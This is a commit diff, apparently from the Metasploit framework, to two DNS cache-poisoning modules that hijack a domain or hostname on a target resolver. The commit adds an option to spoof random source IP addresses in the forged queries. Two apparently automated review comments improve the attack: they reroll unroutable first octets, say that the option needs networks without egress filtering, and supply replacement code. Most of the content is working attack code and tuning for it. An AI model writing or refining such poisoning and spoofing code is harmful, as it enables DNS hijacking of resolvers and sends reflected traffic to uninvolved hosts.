Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now.

git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2008-07-26 04:35:28 +00:00
parent 9b56053974
commit b4fc255a41
2 changed files with 27 additions and 12 deletions


@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
register_options( register_options(
[ [
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
def run def run
target = rhost() target = rhost()
source = Rex::Socket.source_address(target) source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT'] sport = datastore['SRCPORT']
domain = datastore['DOMAIN'] + '.' domain = datastore['DOMAIN'] + '.'
newdns = datastore['NEWDNS'] newdns = datastore['NEWDNS']
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
req.rd = 1 req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = ( buff = (
Scruby::IP.new( Scruby::IP.new(
#:src => barbs[0][:addr].to_s, :src => src_ip,
:src => source,
:dst => target, :dst => target,
:proto => 17 :proto => 17
)/Scruby::UDP.new( )/Scruby::UDP.new(
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer) answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data| answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == domain and data.name.to_s == newdns) if((name.to_s + ".") == domain and data.name.to_s == newdns)
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
srv_sock.close srv_sock.close
disconnect_ip disconnect_ip
return return
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times = [] times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp( sock = Rex::Socket.create_udp(
'PeerHost' => server, 'PeerHost' => server,
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt] times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0 cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false Thread.critical = false
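Review bot: The Random branch added in the hunk at -279, `src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")`, uses the four random bytes verbatim, so about 7% of spoofed queries (18 of 256 first-octet values: 0/8, 127/8 and everything from 224/4 up, including 255.255.255.255) carry a source that the target or the first hop may silently discard, which presumably inflates the `queries` figure the success message now reports. Every accepted one also directs the target's reply at an arbitrary third-party host and only works from a path without egress (BCP 38) filtering; that is inherent in the option, but neither the code nor the SRCADDR help text says so. I would reroll on a bad first octet and document the trade-off as below. `run` starts and ends outside this hunk, and `responses` is presumably defined in the part not shown.
```ruby
    src_ip = source
    if(saddr == 'Random')
      # Spoof a random source so the target's replies scatter across the
      # Internet; skip 0/8, 127/8 and 224/4+ which would be dropped anyway.
      # NOTE: only works from a path without egress (BCP 38) filtering.
      loop do
        octets = Rex::Text.rand_text(4).unpack("C4")
        next if (octets[0] == 0 or octets[0] == 127 or octets[0] >= 224)
        src_ip = octets.join(".")
        break
      end
    end
    # … unchanged: Scruby::IP / Scruby::UDP packet build …
```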


@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
register_options( register_options(
[ [
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
], self.class) ], self.class)
end end
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def auxiliary_commands def auxiliary_commands
return { return {
"check" => "Determine if the specified DNS server (RHOST) is vulnerable", "check" => "Determine if the specified DNS server (RHOST) is vulnerable",
"racer" => "Determine the size of the window for the target server" "racer" => "Determine the size of the window for the target server",
} }
end end
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def run def run
target = rhost() target = rhost()
source = Rex::Socket.source_address(target) source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT'] sport = datastore['SRCPORT']
hostname = datastore['HOSTNAME'] + '.' hostname = datastore['HOSTNAME'] + '.'
address = datastore['NEWADDR'] address = datastore['NEWADDR']
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
req.rd = 1 req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = ( buff = (
Scruby::IP.new( Scruby::IP.new(
#:src => barbs[0][:addr].to_s, :src => src_ip,
:src => source,
:dst => target, :dst => target,
:proto => 17 :proto => 17
)/Scruby::UDP.new( )/Scruby::UDP.new(
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer) answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data| answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address) if((name.to_s + ".") == hostname and data.address.to_s == address)
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}") print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
disconnect_ip disconnect_ip
return return
end end
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times = [] times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp( sock = Rex::Socket.create_udp(
'PeerHost' => server, 'PeerHost' => server,
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt] times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0 cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false Thread.critical = false
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
avg_count avg_count
end end
end end
end end
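Review bot: The source selection in the hunk at -271, `src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")`, lands on 0/8, 127/8 or 224/4+ about 7% of the time (18 of 256 first-octet values), and nothing tells the operator that Random only works when raw IP spoofing actually leaves the host's network. I would rewrite the three lines as `octets = Rex::Text.rand_text(4).unpack("C4")`, `octets[0] = 1 + rand(223) while (octets[0] == 0 or octets[0] == 127 or octets[0] >= 224)` and `src_ip = octets.join(".")`, and extend the option text to `'The source address to use for sending the queries (Random requires a path that permits IP spoofing)'`. Since this block is duplicated verbatim in the BailiWickedDomain module, a shared helper in whatever mixin both modules use would keep the two in step. The enclosing `run` starts and ends outside the hunk, and `responses` in the new status line is presumably defined in the part not shown.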